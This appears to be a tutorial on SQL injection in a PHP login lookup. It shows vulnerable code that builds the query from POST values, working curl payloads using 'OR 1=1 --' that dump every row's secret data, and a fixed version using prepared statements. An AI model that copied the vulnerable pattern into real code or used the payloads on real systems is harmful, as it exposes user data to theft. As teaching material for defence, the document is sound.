Given the following table structure
CREATE TABLE `clients` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `email` varchar(100) NOT NULL,
  `password` varbinary(100) NOT NULL,
  `secretData` varchar(20) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=latin1;
With the following data in it
INSERT INTO `clients` (`email`,`password`)
VALUES
("bob@gmail.com","aadsf345"), ("mark@aol.com","536734sdgf"),
("mary@outlook.com","password123"), ("anna@mail.ru","{}!@#$>,ZX");
And your vulnerable PHP code, which selects a user by their email and password combination and prints the string in the secretData column:
$db = new mysqli("localhost", "root", "", "test");
$email = $_POST['email'];
$pass = $_POST['password'];
// Vulnerable: both POST values are interpolated straight into the SQL text,
// so a single quote in either of them ends the string literal and the rest
// of the input becomes part of the query.
$sql = "SELECT * FROM clients WHERE email = '$email' AND password = '$pass'";
if ($result = $db->query($sql)) {
    while ($obj = $result->fetch_object()) {
        print $obj->secretData . PHP_EOL;
    }
}
else {
    // Note: this branch is only reached when the query itself fails,
    // not when it simply matches zero rows.
    print "no result";
}
A successful login looks like this, displaying bob's secret data:
$ curl -d 'email=bob@gmail.com&password=aadsf345' http://localhost.com
aaaaa
While a successful injection looks like this, displaying everybody's secret data:
$ curl -d 'email=bob@gmail.com&password=aads%27+OR+1=1+--+' http://localhost.com
aaaaa
bbbbb
ccccc
ddddd
If you print out the injected query, the injection starts at the marker, with the %27 (URL-encoded single quote) that closes the password literal. Everything after it is parsed as SQL, and the trailing -- comments out the original closing quote, so the WHERE clause becomes (email = ... AND password = 'aads') OR 1=1, which is true for every row.
SELECT * FROM clients WHERE email = 'bob@gmail.com' AND password = 'aads' OR 1=1 -- '
                                                                        ^
Using OR TRUE instead of OR 1=1 works as well:
curl -d 'email=bob@gmail.com&password=aads%27+OR+TRUE+--+' http://localhost.com
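The fix is to stop building the query from strings at all. Below is the same lookup rewritten with a mysqli prepared statement; this is an added example, not code from the original post. It assumes the same `test` database and `clients` table defined above. With placeholders, the password value `aads' OR 1=1 -- ` is compared byte-for-byte against the password column and matches nothing, and the query's structure cannot be altered by any input.

```php
<?php
// Added example (not part of the original post): the vulnerable lookup above,
// rewritten with a prepared statement so user input is bound as data and can
// never change the query text. Assumes the `clients` table and "test" database
// from the post.
$db = new mysqli("localhost", "root", "", "test");
$db->set_charset("latin1");   // match the table's charset so the driver and server agree

$email = $_POST['email'] ?? '';
$pass  = $_POST['password'] ?? '';

// The SQL text is fixed; the two ? placeholders are filled in by the server
// from the bound values, not by string concatenation.
$stmt = $db->prepare("SELECT secretData FROM clients WHERE email = ? AND password = ?");
if ($stmt === false) {
    print "query error" . PHP_EOL;   // e.g. schema mismatch; do not echo $db->error to users
    exit;
}
$stmt->bind_param("ss", $email, $pass);   // "ss": both parameters are bound as strings
$stmt->execute();

$result = $stmt->get_result();            // mysqli_result; needs the mysqlnd driver (default on current PHP)
if ($result->num_rows === 0) {
    // Reached for a wrong email/password pair as well as for an injection
    // attempt, which the original code did not distinguish from a query failure.
    print "no result" . PHP_EOL;
}
while ($obj = $result->fetch_object()) {
    print $obj->secretData . PHP_EOL;
}
$stmt->close();
```

Re-running the second curl command from the post against this version prints `no result`, because the whole string `aads' OR 1=1 -- ` is now the password being compared. The comparison is kept on the plaintext password column exactly as the table above defines it, to stay on the injection point; in a real application that column would hold a `password_hash()` digest, the row would be fetched by email alone, and the check would be `password_verify()` in PHP.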